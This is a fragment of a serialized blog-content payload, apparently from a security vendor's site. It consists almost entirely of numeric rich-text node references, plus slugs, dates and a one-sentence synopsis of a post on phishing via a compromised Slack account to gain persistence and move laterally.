ype":864},{},[],{"data":63620,"content":63621,"nodeType":860},{},[63622],{"data":63623,"marks":63624,"value":61036,"nodeType":864},{},[],{"data":63626,"content":63627,"nodeType":61070},{},[63628,63637,63646],{"data":63629,"content":63630,"nodeType":945},{},[63631],{"data":63632,"content":63633,"nodeType":860},{},[63634],{"data":63635,"marks":63636,"value":61049,"nodeType":864},{},[],{"data":63638,"content":63639,"nodeType":945},{},[63640],{"data":63641,"content":63642,"nodeType":860},{},[63643],{"data":63644,"marks":63645,"value":61059,"nodeType":864},{},[],{"data":63647,"content":63648,"nodeType":945},{},[63649],{"data":63650,"content":63651,"nodeType":860},{},[63652],{"data":63653,"marks":63654,"value":61069,"nodeType":864},{},[],{"data":63656,"content":63657,"nodeType":1312},{},[63658],{"data":63659,"marks":63660,"value":61077,"nodeType":864},{},[],{"data":63662,"content":63663,"nodeType":860},{},[63664],{"data":63665,"marks":63666,"value":61084,"nodeType":864},{},[],{"data":63668,"content":63669,"nodeType":860},{},[63670],{"data":63671,"marks":63672,"value":61091,"nodeType":864},{},[],{"data":63674,"content":63675,"nodeType":860},{},[63676],{"data":63677,"marks":63678,"value":61098,"nodeType":864},{},[],{"data":63680,"content":63681,"nodeType":860},{},[63682],{"data":63683,"marks":63684,"value":61105,"nodeType":864},{},[],{"data":63686,"content":63689,"nodeType":996},{"target":63687},{"sys":63688},{"id":61110,"type":1001,"linkType":1002},[],{"data":63691,"content":63692,"nodeType":1312},{},[63693],{"data":63694,"marks":63695,"value":61118,"nodeType":864},{},[],{"data":63697,"content":63698,"nodeType":860},{},[63699],{"data":63700,"marks":63701,"value":61125,"nodeType":864},{},[],{"data":63703,"content":63704,"nodeType":860},{},[63705],{"data":63706,"marks":63707,"value":61132,"nodeType":864},{},[],{"data":63709,"content":63710,"nodeType":860},{},[63711],{"data":63712,"marks":63713,"value":61140,"nodeType":864},{},[63714],{"type":899},{"data":63716,"content":63717,"nodeType":1312},{},[63718],{"data":63719,"marks":63720,"value":61147,"nodeType":864},{},[],{"data":63722,"content":63723,"nodeType":860},{},[63724,63727,63734],{"data":63725,"marks":63726,"value":61154,"nodeType":864},{},[],{"data":63728,"content":63729,"nodeType":883},{"uri":61157},[63730],{"data":63731,"marks":63732,"value":61163,"nodeType":864},{},[63733],{"type":1455},{"data":63735,"marks":63736,"value":61167,"nodeType":864},{},[],{"data":63738,"content":63739,"nodeType":860},{},[63740],{"data":63741,"marks":63742,"value":61174,"nodeType":864},{},[],{"data":63744,"content":63745,"nodeType":860},{},[63746],{"data":63747,"marks":63748,"value":61181,"nodeType":864},{},[],{"data":63750,"content":63751,"nodeType":1009},{},[63752],{"data":63753,"marks":63754,"value":61188,"nodeType":864},{},[],{"data":63756,"content":63757,"nodeType":860},{},[63758],{"data":63759,"marks":63760,"value":61195,"nodeType":864},{},[],{"data":63762,"content":63763,"nodeType":860},{},[63764],{"data":63765,"marks":63766,"value":61202,"nodeType":864},{},[],{"data":63768,"content":63769,"nodeType":860},{},[63770],{"data":63771,"marks":63772,"value":61209,"nodeType":864},{},[],{"data":63774,"content":63775,"nodeType":860},{},[63776],{"data":63777,"marks":63778,"value":61216,"nodeType":864},{},[],{"data":63780,"content":63781,"nodeType":860},{},[63782],{"data":63783,"marks":63784,"value":61223,"nodeType":864},{},[],{"data":63786,"content":63787,"nodeType":860},{},[63788],{"data":63789,"marks":63790,"value":61230,"nodeType":864},{},[],{"data":63792,"content":63795,"nodeType":996},{"target":63793},{"sys":63794},{"id":61235,"type":1001,"linkType":1002},[],{"data":63797,"content":63798,"nodeType":1009},{},[63799],{"data":63800,"marks":63801,"value":61243,"nodeType":864},{},[],{"data":63803,"content":63804,"nodeType":860},{},[63805,63808,63815],{"data":63806,"marks":63807,"value":61250,"nodeType":864},{},[],{"data":63809,"content":63810,"nodeType":883},{"uri":61253},[63811],{"data":63812,"marks":63813,"value":61259,"nodeType":864},{},[63814],{"type":1455},{"data":63816,"marks":63817,"value":61263,"nodeType":864},{},[],{"data":63819,"content":63820,"nodeType":1312},{},[63821],{"data":63822,"marks":63823,"value":61270,"nodeType":864},{},[],{"data":63825,"content":63826,"nodeType":860},{},[63827,63830,63837],{"data":63828,"marks":63829,"value":61277,"nodeType":864},{},[],{"data":63831,"content":63832,"nodeType":883},{"uri":61280},[63833],{"data":63834,"marks":63835,"value":61280,"nodeType":864},{},[63836],{"type":1455},{"data":63838,"marks":63839,"value":61289,"nodeType":864},{},[],{"data":63841,"content":63844,"nodeType":996},{"target":63842},{"sys":63843},{"id":61294,"type":1001,"linkType":1002},[],{"data":63846,"content":63849,"nodeType":996},{"target":63847},{"sys":63848},{"id":61300,"type":1001,"linkType":1002},[],{"data":63851,"content":63854,"nodeType":996},{"target":63852},{"sys":63853},{"id":61306,"type":1001,"linkType":1002},[],{"data":63856,"content":63857,"nodeType":1312},{},[63858],{"data":63859,"marks":63860,"value":61314,"nodeType":864},{},[],{"data":63862,"content":63863,"nodeType":860},{},[63864],{"data":63865,"marks":63866,"value":61321,"nodeType":864},{},[],{"data":63868,"content":63869,"nodeType":860},{},[63870],{"data":63871,"marks":63872,"value":61328,"nodeType":864},{},[],{"data":63874,"content":63877,"nodeType":996},{"target":63875},{"sys":63876},{"id":61333,"type":1001,"linkType":1002},[],{"data":63879,"content":63882,"nodeType":996},{"target":63880},{"sys":63881},{"id":61339,"type":1001,"linkType":1002},[],{"data":63884,"content":63885,"nodeType":1009},{},[63886],{"data":63887,"marks":63888,"value":61347,"nodeType":864},{},[],{"data":63890,"content":63891,"nodeType":860},{},[63892],{"data":63893,"marks":63894,"value":61354,"nodeType":864},{},[],{"data":63896,"content":63897,"nodeType":860},{},[63898],{"data":63899,"marks":63900,"value":61361,"nodeType":864},{},[],{"data":63902,"content":63903,"nodeType":1312},{},[63904],{"data":63905,"marks":63906,"value":61368,"nodeType":864},{},[],{"data":63908,"content":63909,"nodeType":860},{},[63910],{"data":63911,"marks":63912,"value":61375,"nodeType":864},{},[],{"data":63914,"content":63917,"nodeType":996},{"target":63915},{"sys":63916},{"id":61380,"type":1001,"linkType":1002},[],{"data":63919,"content":63920,"nodeType":860},{},[63921,63924,63931],{"data":63922,"marks":63923,"value":61388,"nodeType":864},{},[],{"data":63925,"content":63926,"nodeType":883},{"uri":60804},[63927],{"data":63928,"marks":63929,"value":60810,"nodeType":864},{},[63930],{"type":1455},{"data":63932,"marks":63933,"value":61399,"nodeType":864},{},[],{"data":63935,"content":63936,"nodeType":860},{},[63937,63940,63947],{"data":63938,"marks":63939,"value":61406,"nodeType":864},{},[],{"data":63941,"content":63942,"nodeType":883},{"uri":61409},[63943],{"data":63944,"marks":63945,"value":61415,"nodeType":864},{},[63946],{"type":1455},{"data":63948,"marks":63949,"value":61419,"nodeType":864},{},[],{"data":63951,"content":63952,"nodeType":860},{},[63953],{"data":63954,"marks":63955,"value":61426,"nodeType":864},{},[],{"data":63957,"content":63960,"nodeType":996},{"target":63958},{"sys":63959},{"id":61431,"type":1001,"linkType":1002},[],{"data":63962,"content":63965,"nodeType":996},{"target":63963},{"sys":63964},{"id":61437,"type":1001,"linkType":1002},[],{"data":63967,"content":63968,"nodeType":860},{},[63969],{"data":63970,"marks":63971,"value":61445,"nodeType":864},{},[],{"data":63973,"content":63974,"nodeType":1312},{},[63975],{"data":63976,"marks":63977,"value":61452,"nodeType":864},{},[],{"data":63979,"content":63980,"nodeType":860},{},[63981],{"data":63982,"marks":63983,"value":61459,"nodeType":864},{},[],{"data":63985,"content":63986,"nodeType":860},{},[63987],{"data":63988,"marks":63989,"value":61466,"nodeType":864},{},[],{"data":63991,"content":63992,"nodeType":941},{},[63993,64002],{"data":63994,"content":63995,"nodeType":945},{},[63996],{"data":63997,"content":63998,"nodeType":860},{},[63999],{"data":64000,"marks":64001,"value":61479,"nodeType":864},{},[],{"data":64003,"content":64004,"nodeType":945},{},[64005],{"data":64006,"content":64007,"nodeType":860},{},[64008],{"data":64009,"marks":64010,"value":61489,"nodeType":864},{},[],{"data":64012,"content":64015,"nodeType":996},{"target":64013},{"sys":64014},{"id":61494,"type":1001,"linkType":1002},[],{"data":64017,"content":64020,"nodeType":996},{"target":64018},{"sys":64019},{"id":61500,"type":1001,"linkType":1002},[],{"data":64022,"content":64023,"nodeType":860},{},[64024],{"data":64025,"marks":64026,"value":61508,"nodeType":864},{},[],{"data":64028,"content":64029,"nodeType":860},{},[64030],{"data":64031,"marks":64032,"value":61515,"nodeType":864},{},[],{"data":64034,"content":64035,"nodeType":860},{},[64036],{"data":64037,"marks":64038,"value":61522,"nodeType":864},{},[],{"data":64040,"content":64041,"nodeType":860},{},[64042,64045],{"data":64043,"marks":64044,"value":61529,"nodeType":864},{},[],{"data":64046,"marks":64047,"value":14717,"nodeType":864},{},[64048],{"type":2246},{"data":64050,"content":64053,"nodeType":996},{"target":64051},{"sys":64052},{"id":61538,"type":1001,"linkType":1002},[],{"data":64055,"content":64056,"nodeType":860},{},[64057],{"data":64058,"marks":64059,"value":61546,"nodeType":864},{},[],{"data":64061,"content":64064,"nodeType":996},{"target":64062},{"sys":64063},{"id":61551,"type":1001,"linkType":1002},[],{"data":64066,"content":64069,"nodeType":996},{"target":64067},{"sys":64068},{"id":61557,"type":1001,"linkType":1002},[],{"data":64071,"content":64072,"nodeType":860},{},[64073],{"data":64074,"marks":64075,"value":61565,"nodeType":864},{},[],{"data":64077,"content":64078,"nodeType":1009},{},[64079],{"data":64080,"marks":64081,"value":61572,"nodeType":864},{},[],{"data":64083,"content":64084,"nodeType":860},{},[64085],{"data":64086,"marks":64087,"value":61579,"nodeType":864},{},[],{"data":64089,"content":64092,"nodeType":996},{"target":64090},{"sys":64091},{"id":61584,"type":1001,"linkType":1002},[],{"data":64094,"content":64097,"nodeType":996},{"target":64095},{"sys":64096},{"id":61590,"type":1001,"linkType":1002},[],{"data":64099,"content":64100,"nodeType":1009},{},[64101],{"data":64102,"marks":64103,"value":58288,"nodeType":864},{},[],{"data":64105,"content":64106,"nodeType":860},{},[64107],{"data":64108,"marks":64109,"value":61604,"nodeType":864},{},[],{"data":64111,"content":64112,"nodeType":941},{},[64113,64122,64131,64140,64149,64197,64206],{"data":64114,"content":64115,"nodeType":945},{},[64116],{"data":64117,"content":64118,"nodeType":860},{},[64119],{"data":64120,"marks":64121,"value":61617,"nodeType":864},{},[],{"data":64123,"content":64124,"nodeType":945},{},[64125],{"data":64126,"content":64127,"nodeType":860},{},[64128],{"data":64129,"marks":64130,"value":61627,"nodeType":864},{},[],{"data":64132,"content":64133,"nodeType":945},{},[64134],{"data":64135,"content":64136,"nodeType":860},{},[64137],{"data":64138,"marks":64139,"value":61637,"nodeType":864},{},[],{"data":64141,"content":64142,"nodeType":945},{},[64143],{"data":64144,"content":64145,"nodeType":860},{},[64146],{"data":64147,"marks":64148,"value":61647,"nodeType":864},{},[],{"data":64150,"content":64151,"nodeType":945},{},[64152,64158],{"data":64153,"content":64154,"nodeType":860},{},[64155],{"data":64156,"marks":64157,"value":61657,"nodeType":864},{},[],{"data":64159,"content":64160,"nodeType":941},{},[64161,64170,64179,64188],{"data":64162,"content":64163,"nodeType":945},{},[64164],{"data":64165,"content":64166,"nodeType":860},{},[64167],{"data":64168,"marks":64169,"value":61670,"nodeType":864},{},[],{"data":64171,"content":64172,"nodeType":945},{},[64173],{"data":64174,"content":64175,"nodeType":860},{},[64176],{"data":64177,"marks":64178,"value":61680,"nodeType":864},{},[],{"data":64180,"content":64181,"nodeType":945},{},[64182],{"data":64183,"content":64184,"nodeType":860},{},[64185],{"data":64186,"marks":64187,"value":61690,"nodeType":864},{},[],{"data":64189,"content":64190,"nodeType":945},{},[64191],{"data":64192,"content":64193,"nodeType":860},{},[64194],{"data":64195,"marks":64196,"value":61700,"nodeType":864},{},[],{"data":64198,"content":64199,"nodeType":945},{},[64200],{"data":64201,"content":64202,"nodeType":860},{},[64203],{"data":64204,"marks":64205,"value":61710,"nodeType":864},{},[],{"data":64207,"content":64208,"nodeType":945},{},[64209],{"data":64210,"content":64211,"nodeType":860},{},[64212],{"data":64213,"marks":64214,"value":61720,"nodeType":864},{},[],{"data":64216,"content":64217,"nodeType":1009},{},[64218],{"data":64219,"marks":64220,"value":24968,"nodeType":864},{},[],{"data":64222,"content":64223,"nodeType":860},{},[64224],{"data":64225,"marks":64226,"value":61733,"nodeType":864},{},[],{"data":64228,"content":64229,"nodeType":860},{},[64230],{"data":64231,"marks":64232,"value":61740,"nodeType":864},{},[],{"items":64234},[64235,64237],{"sys":64236,"name":6593},{"id":6592},{"sys":64238,"name":342},{"id":6596},{"items":64240},[64241],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":64242},{"url":4955},{"__typename":2059,"sys":64244,"content":64245,"title":5236,"synopsis":60848,"hashTags":59,"publishedDate":60849,"slug":59151,"tagsCollection":64639,"authorsCollection":64645},{"id":58881},{"json":64246},{"data":64247,"content":64248,"nodeType":856},{},[64249,64265,64271,64277,64283,64299,64305,64321,64327,64333,64339,64345,64351,64357,64363,64379,64385,64391,64396,64402,64408,64414,64419,64424,64429,64435,64441,64446,64452,64458,64464,64469,64475,64481,64487,64493,64499,64504,64510,64516,64521,64527,64533,64538,64544,64550,64609,64615,64621,64627,64633],{"data":64250,"content":64251,"nodeType":860},{},[64252,64255,64262],{"data":64253,"marks":64254,"value":60406,"nodeType":864},{},[],{"data":64256,"content":64257,"nodeType":883},{"uri":6418},[64258],{"data":64259,"marks":64260,"value":5765,"nodeType":864},{},[64261],{"type":1455},{"data":64263,"marks":64264,"value":60417,"nodeType":864},{},[],{"data":64266,"content":64267,"nodeType":860},{},[64268],{"data":64269,"marks":64270,"value":60424,"nodeType":864},{},[],{"data":64272,"content":64273,"nodeType":860},{},[64274],{"data":64275,"marks":64276,"value":60431,"nodeType":864},{},[],{"data":64278,"content":64279,"nodeType":1009},{},[64280],{"data":64281,"marks":64282,"value":58596,"nodeType":864},{},[],{"data":64284,"content":64285,"nodeType":860},{},[64286,64289,64296],{"data":64287,"marks":64288,"value":21,"nodeType":864},{},[],{"data":64290,"content":64291,"nodeType":883},{"uri":58605},[64292],{"data":64293,"marks":64294,"value":58610,"nodeType":864},{},[64295],{"type":1455},{"data":64297,"marks":64298,"value":58614,"nodeType":864},{},[],{"data":64300,"content":64301,"nodeType":1009},{},[64302],{"data":64303,"marks":64304,"value":60460,"nodeType":864},{},[],{"data":64306,"content":64307,"nodeType":860},{},[64308,64311,64318],{"data":64309,"marks":64310,"value":21,"nodeType":864},{},[],{"data":64312,"content":64313,"nodeType":883},{"uri":40614},[64314],{"data":64315,"marks":64316,"value":5272,"nodeType":864},{},[64317],{"type":1455},{"data":64319,"marks":64320,"value":60477,"nodeType":864},{},[],{"data":64322,"content":64323,"nodeType":1009},{},[64324],{"data":64325,"marks":64326,"value":60484,"nodeType":864},{},[],{"data":64328,"content":64329,"nodeType":860},{},[64330],{"data":64331,"marks":64332,"value":60491,"nodeType":864},{},[],{"data":64334,"content":64335,"nodeType":860},{},[64336],{"data":64337,"marks":64338,"value":60498,"nodeType":864},{},[],{"data":64340,"content":64341,"nodeType":860},{},[64342],{"data":64343,"marks":64344,"value":60505,"nodeType":864},{},[],{"data":64346,"content":64347,"nodeType":860},{},[64348],{"data":64349,"marks":64350,"value":60512,"nodeType":864},{},[],{"data":64352,"content":64353,"nodeType":860},{},[64354],{"data":64355,"marks":64356,"value":60519,"nodeType":864},{},[],{"data":64358,"content":64359,"nodeType":1009},{},[64360],{"data":64361,"marks":64362,"value":60526,"nodeType":864},{},[],{"data":64364,"content":64365,"nodeType":860},{},[64366,64369,64376],{"data":64367,"marks":64368,"value":60533,"nodeType":864},{},[],{"data":64370,"content":64371,"nodeType":883},{"uri":60536},[64372],{"data":64373,"marks":64374,"value":60542,"nodeType":864},{},[64375],{"type":1455},{"data":64377,"marks":64378,"value":60546,"nodeType":864},{},[],{"data":64380,"content":64381,"nodeType":860},{},[64382],{"data":64383,"marks":64384,"value":60553,"nodeType":864},{},[],{"data":64386,"content":64387,"nodeType":860},{},[64388],{"data":64389,"marks":64390,"value":60560,"nodeType":864},{},[],{"data":64392,"content":64395,"nodeType":996},{"target":64393},{"sys":64394},{"id":60565,"type":1001,"linkType":1002},[],{"data":64397,"content":64398,"nodeType":860},{},[64399],{"data":64400,"marks":64401,"value":60573,"nodeType":864},{},[],{"data":64403,"content":64404,"nodeType":1312},{},[64405],{"data":64406,"marks":64407,"value":60580,"nodeType":864},{},[],{"data":64409,"content":64410,"nodeType":860},{},[64411],{"data":64412,"marks":64413,"value":60587,"nodeType":864},{},[],{"data":64415,"content":64418,"nodeType":996},{"target":64416},{"sys":64417},{"id":60592,"type":1001,"linkType":1002},[],{"data":64420,"content":64423,"nodeType":996},{"target":64421},{"sys":64422},{"id":60598,"type":1001,"linkType":1002},[],{"data":64425,"content":64428,"nodeType":996},{"target":64426},{"sys":64427},{"id":60604,"type":1001,"linkType":1002},[],{"data":64430,"content":64431,"nodeType":1312},{},[64432],{"data":64433,"marks":64434,"value":60612,"nodeType":864},{},[],{"data":64436,"content":64437,"nodeType":860},{},[64438],{"data":64439,"marks":64440,"value":60619,"nodeType":864},{},[],{"data":64442,"content":64445,"nodeType":996},{"target":64443},{"sys":64444},{"id":60624,"type":1001,"linkType":1002},[],{"data":64447,"content":64448,"nodeType":1312},{},[64449],{"data":64450,"marks":64451,"value":60632,"nodeType":864},{},[],{"data":64453,"content":64454,"nodeType":860},{},[64455],{"data":64456,"marks":64457,"value":60639,"nodeType":864},{},[],{"data":64459,"content":64460,"nodeType":860},{},[64461],{"data":64462,"marks":64463,"value":60646,"nodeType":864},{},[],{"data":64465,"content":64468,"nodeType":996},{"target":64466},{"sys":64467},{"id":60651,"type":1001,"linkType":1002},[],{"data":64470,"content":64471,"nodeType":860},{},[64472],{"data":64473,"marks":64474,"value":60659,"nodeType":864},{},[],{"data":64476,"content":64477,"nodeType":1009},{},[64478],{"data":64479,"marks":64480,"value":60666,"nodeType":864},{},[],{"data":64482,"content":64483,"nodeType":1312},{},[64484],{"data":64485,"marks":64486,"value":60673,"nodeType":864},{},[],{"data":64488,"content":64489,"nodeType":860},{},[64490],{"data":64491,"marks":64492,"value":60680,"nodeType":864},{},[],{"data":64494,"content":64495,"nodeType":860},{},[64496],{"data":64497,"marks":64498,"value":60687,"nodeType":864},{},[],{"data":64500,"content":64503,"nodeType":996},{"target":64501},{"sys":64502},{"id":60692,"type":1001,"linkType":1002},[],{"data":64505,"content":64506,"nodeType":1312},{},[64507],{"data":64508,"marks":64509,"value":60700,"nodeType":864},{},[],{"data":64511,"content":64512,"nodeType":860},{},[64513],{"data":64514,"marks":64515,"value":60707,"nodeType":864},{},[],{"data":64517,"content":64520,"nodeType":996},{"target":64518},{"sys":64519},{"id":60712,"type":1001,"linkType":1002},[],{"data":64522,"content":64523,"nodeType":860},{},[64524],{"data":64525,"marks":64526,"value":60720,"nodeType":864},{},[],{"data":64528,"content":64529,"nodeType":860},{},[64530],{"data":64531,"marks":64532,"value":60727,"nodeType":864},{},[],{"data":64534,"content":64537,"nodeType":996},{"target":64535},{"sys":64536},{"id":60732,"type":1001,"linkType":1002},[],{"data":64539,"content":64540,"nodeType":1009},{},[64541],{"data":64542,"marks":64543,"value":58288,"nodeType":864},{},[],{"data":64545,"content":64546,"nodeType":860},{},[64547],{"data":64548,"marks":64549,"value":60746,"nodeType":864},{},[],{"data":64551,"content":64552,"nodeType":941},{},[64553,64562,64571,64590],{"data":64554,"content":64555,"nodeType":945},{},[64556],{"data":64557,"content":64558,"nodeType":860},{},[64559],{"data":64560,"marks":64561,"value":60759,"nodeType":864},{},[],{"data":64563,"content":64564,"nodeType":945},{},[64565],{"data":64566,"content":64567,"nodeType":860},{},[64568],{"data":64569,"marks":64570,"value":60769,"nodeType":864},{},[],{"data":64572,"content":64573,"nodeType":945},{},[64574],{"data":64575,"content":64576,"nodeType":860},{},[64577,64580,64587],{"data":64578,"marks":64579,"value":60779,"nodeType":864},{},[],{"data":64581,"content":64582,"nodeType":883},{"uri":60782},[64583],{"data":64584,"marks":64585,"value":60788,"nodeType":864},{},[64586],{"type":1455},{"data":64588,"marks":64589,"value":21,"nodeType":864},{},[],{"data":64591,"content":64592,"nodeType":945},{},[64593],{"data":64594,"content":64595,"nodeType":860},{},[64596,64599,64606],{"data":64597,"marks":64598,"value":60801,"nodeType":864},{},[],{"data":64600,"content":64601,"nodeType":883},{"uri":60804},[64602],{"data":64603,"marks":64604,"value":60810,"nodeType":864},{},[64605],{"type":1455},{"data":64607,"marks":64608,"value":21,"nodeType":864},{},[],{"data":64610,"content":64611,"nodeType":860},{},[64612],{"data":64613,"marks":64614,"value":60820,"nodeType":864},{},[],{"data":64616,"content":64617,"nodeType":1312},{},[64618],{"data":64619,"marks":64620,"value":24968,"nodeType":864},{},[],{"data":64622,"content":64623,"nodeType":860},{},[64624],{"data":64625,"marks":64626,"value":60833,"nodeType":864},{},[],{"data":64628,"content":64629,"nodeType":860},{},[64630],{"data":64631,"marks":64632,"value":60840,"nodeType":864},{},[],{"data":64634,"content":64635,"nodeType":860},{},[64636],{"data":64637,"marks":64638,"value":60847,"nodeType":864},{},[],{"items":64640},[64641,64643],{"sys":64642,"name":6593},{"id":6592},{"sys":64644,"name":342},{"id":6596},{"items":64646},[64647],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":64648},{"url":4955},"blog/phishing-slack-persistence",{"json":64651},{"data":64652,"content":64653,"nodeType":856},{},[64654,64661],{"data":64655,"content":64656,"nodeType":860},{},[64657],{"data":64658,"marks":64659,"value":64660,"nodeType":864},{},[],"In this post, we're going to demonstrate how an attacker who has gained a foothold by compromising a Slack user account can leverage that to maintain persistence and also conduct more advanced social engineering attacks to move laterally.",{"data":64662,"content":64663,"nodeType":860},{},[64664],{"data":64665,"marks":64666,"value":10632,"nodeType":864},{},[],"In this post, we're going to demonstrate how to phish via Slack to gain persistence and move laterally. ",{"id":57717,"publishedAt":64669},"2026-08-12T11:55:48.802Z",{"items":64671},[64672,64674],{"sys":64673,"name":6593},{"id":6592},{"sys":64675,"name":297},{"id":2732},{"items":64677},[64678,64680,64682,64684,64686,64688,64690,64692,64694,64696],{"sys":64679,"name":279,"slug":280,"tier":31},{"id":276},{"sys":64681,"name":545,"slug":546,"tier":31},{"id":542},{"sys":64683,"name":413,"slug":414,"tier":31},{"id":410},{"sys":64685,"name":519,"slug":520,"tier":31},{"id":516},{"sys":64687,"name":607,"slug":608,"tier":45},{"id":604},{"sys":64689,"name":484,"slug":485,"tier":45},{"id":481},{"sys":64691,"name":475,"slug":476,"tier":45},{"id":472},{"sys":64693,"name":404,"slug":405,"tier":45},{"id":401},{"sys":64695,"name":431,"slug":432,"tier":45},{"id":428},{"sys":64697,"name":324,"slug":325,"tier":45},{"id":321},"kajem1CwOlPFTsH1-GIjCT-0TxtKca6kdQ7FIo4TDHs",{"id":64700,"title":61741,"authorsCollection":64701,"content":64706,"extension":228,"faqItemsCollection":65602,"faqTitle":59,"featured":6,"hashTags":59,"meta":65604,"metaTitle":65605,"ogImage":59,"postType":5740,"publishedDate":61742,"relatedBlogPostsCollection":65606,"slug":61743,"stem":67258,"subtitle":59,"summary":67259,"synopsis":60873,"sys":67270,"tagsCollection":67272,"topicsCollection":67278,"__hash__":67300},"blog/blog/nearly-invisible-attack-chain.json",{"items":64702},[64703],{"fullName":4949,"firstName":4950,"jobTitle":4951,"socialLinks":64704,"profilePicture":64705},[4953],{"url":4955},{"json":64707,"links":65465},{"data":64708,"content":64709,"nodeType":856},{},[64710,64716,64722,64750,64756,64762,64778,64784,64790,64796,64820,64826,64832,64845,64851,64857,64887,64893,64899,64905,64911,64917,64922,64928,64934,64940,64947,64953,64969,64975,64981,64987,64993,64999,65005,65011,65017,65023,65028,65034,65050,65056,65072,65077,65082,65087,65093,65099,65105,65110,65115,65121,65127,65133,65139,65145,65150,65166,65182,65188,65193,65198,65204,65210,65216,65222,65243,65248,65253,65259,65265,65271,65281,65286,65292,65297,65302,65308,65314,65320,65325,65330,65336,65342,65447,65453,65459],{"data":64711,"content":64712,"nodeType":860},{},[64713],{"data":64714,"marks":64715,"value":60873,"nodeType":864},{},[],{"data":64717,"content":64718,"nodeType":860},{},[64719],{"data":64720,"marks":64721,"value":60880,"nodeType":864},{},[],{"data":64723,"content":64724,"nodeType":860},{},[64725,64728,64735,64738,64747],{"data":64726,"marks":64727,"value":60887,"nodeType":864},{},[],{"data":64729,"content":64730,"nodeType":883},{"uri":6418},[64731],{"data":64732,"marks":64733,"value":5765,"nodeType":864},{},[64734],{"type":1455},{"data":64736,"marks":64737,"value":60898,"nodeType":864},{},[],{"data":64739,"content":64742,"nodeType":57700},{"target":64740},{"sys":64741},{"id":58881,"type":1001,"linkType":1002},[64743],{"data":64744,"marks":64745,"value":5236,"nodeType":864},{},[64746],{"type":1455},{"data":64748,"marks":64749,"value":10094,"nodeType":864},{},[],{"data":64751,"content":64752,"nodeType":860},{},[64753],{"data":64754,"marks":64755,"value":60917,"nodeType":864},{},[],{"data":64757,"content":64758,"nodeType":1009},{},[64759],{"data":64760,"marks":64761,"value":60924,"nodeType":864},{},[],{"data":64763,"content":64764,"nodeType":860},{},[64765,64768,64775],{"data":64766,"marks":64767,"value":60931,"nodeType":864},{},[],{"data":64769,"content":64770,"nodeType":883},{"uri":59957},[64771],{"data":64772,"marks":64773,"value":60939,"nodeType":864},{},[64774],{"type":1455},{"data":64776,"marks":64777,"value":60943,"nodeType":864},{},[],{"data":64779,"content":64780,"nodeType":860},{},[64781],{"data":64782,"marks":64783,"value":60950,"nodeType":864},{},[],{"data":64785,"content":64786,"nodeType":1009},{},[64787],{"data":64788,"marks":64789,"value":60957,"nodeType":864},{},[],{"data":64791,"content":64792,"nodeType":860},{},[64793],{"data":64794,"marks":64795,"value":60964,"nodeType":864},{},[],{"data":64797,"content":64798,"nodeType":860},{},[64799,64802,64809,64812,64817],{"data":64800,"marks":64801,"value":60971,"nodeType":864},{},[],{"data":64803,"content":64804,"nodeType":883},{"uri":39722},[64805],{"data":64806,"marks":64807,"value":60979,"nodeType":864},{},[64808],{"type":1455},{"data":64810,"marks":64811,"value":60983,"nodeType":864},{},[],{"data":64813,"marks":64814,"value":60989,"nodeType":864},{},[64815,64816],{"type":2246},{"type":899},{"data":64818,"marks":64819,"value":60993,"nodeType":864},{},[],{"data":64821,"content":64822,"nodeType":1009},{},[64823],{"data":64824,"marks":64825,"value":60484,"nodeType":864},{},[],{"data":64827,"content":64828,"nodeType":860},{},[64829],{"data":64830,"marks":64831,"value":61006,"nodeType":864},{},[],{"data":64833,"content":64834,"nodeType":860},{},[64835,64838,64842],{"data":64836,"marks":64837,"value":61013,"nodeType":864},{},[],{"data":64839,"marks":64840,"value":61018,"nodeType":864},{},[64841],{"type":1455},{"data":64843,"marks":64844,"value":61022,"nodeType":864},{},[],{"data":64846,"content":64847,"nodeType":860},{},[64848],{"data":64849,"marks":64850,"value":61029,"nodeType":864},{},[],{"data":64852,"content":64853,"nodeType":860},{},[64854],{"data":64855,"marks":64856,"value":61036,"nodeType":864},{},[],{"data":64858,"content":64859,"nodeType":61070},{},[64860,64869,64878],{"data":64861,"content":64862,"nodeType":945},{},[64863],{"data":64864,"content":64865,"nodeType":860},{},[64866],{"data":64867,"marks":64868,"value":61049,"nodeType":864},{},[],{"data":64870,"content":64871,"nodeType":945},{},[64872],{"data":64873,"content":64874,"nodeType":860},{},[64875],{"data":64876,"marks":64877,"value":61059,"nodeType":864},{},[],{"data":64879,"content":64880,"nodeType":945},{},[64881],{"data":64882,"content":64883,"nodeType":860},{},[64884],{"data":64885,"marks":64886,"value":61069,"nodeType":864},{},[],{"data":64888,"content":64889,"nodeType":1312},{},[64890],{"data":64891,"marks":64892,"value":61077,"nodeType":864},{},[],{"data":64894,"content":64895,"nodeType":860},{},[64896],{"data":64897,"marks":64898,"value":61084,"nodeType":864},{},[],{"data":64900,"content":64901,"nodeType":860},{},[64902],{"data":64903,"marks":64904,"value":61091,"nodeType":864},{},[],{"data":64906,"content":64907,"nodeType":860},{},[64908],{"data":64909,"marks":64910,"value":61098,"nodeType":864},{},[],{"data":64912,"content":64913,"nodeType":860},{},[64914],{"data":64915,"marks":64916,"value":61105,"nodeType":864},{},[],{"data":64918,"content":64921,"nodeType":996},{"target":64919},{"sys":64920},{"id":61110,"type":1001,"linkType":1002},[],{"data":64923,"content":64924,"nodeType":1312},{},[64925],{"data":64926,"marks":64927,"value":61118,"nodeType":864},{},[],{"data":64929,"content":64930,"nodeType":860},{},[64931],{"data":64932,"marks":64933,"value":61125,"nodeType":864},{},[],{"data":64935,"content":64936,"nodeType":860},{},[64937],{"data":64938,"marks":64939,"value":61132,"nodeType":864},{},[],{"data":64941,"content":64942,"nodeType":860},{},[64943],{"data":64944,"marks":64945,"value":61140,"nodeType":864},{},[64946],{"type":899},{"data":64948,"content":64949,"nodeType":1312},{},[64950],{"data":64951,"marks":64952,"value":61147,"nodeType":864},{},[],{"data":64954,"content":64955,"nodeType":860},{},[64956,64959,64966],{"data":64957,"marks":64958,"value":61154,"nodeType":864},{},[],{"data":64960,"content":64961,"nodeType":883},{"uri":61157},[64962],{"data":64963,"marks":64964,"value":61163,"nodeType":864},{},[64965],{"type":1455},{"data":64967,"marks":64968,"value":61167,"nodeType":864},{},[],{"data":64970,"content":64971,"nodeType":860},{},[64972],{"data":64973,"marks":64974,"value":61174,"nodeType":864},{},[],{"data":64976,"content":64977,"nodeType":860},{},[64978],{"data":64979,"marks":64980,"value":61181,"nodeType":864},{},[],{"data":64982,"content":64983,"nodeType":1009},{},[64984],{"data":64985,"marks":64986,"value":61188,"nodeType":864},{},[],{"data":64988,"content":64989,"nodeT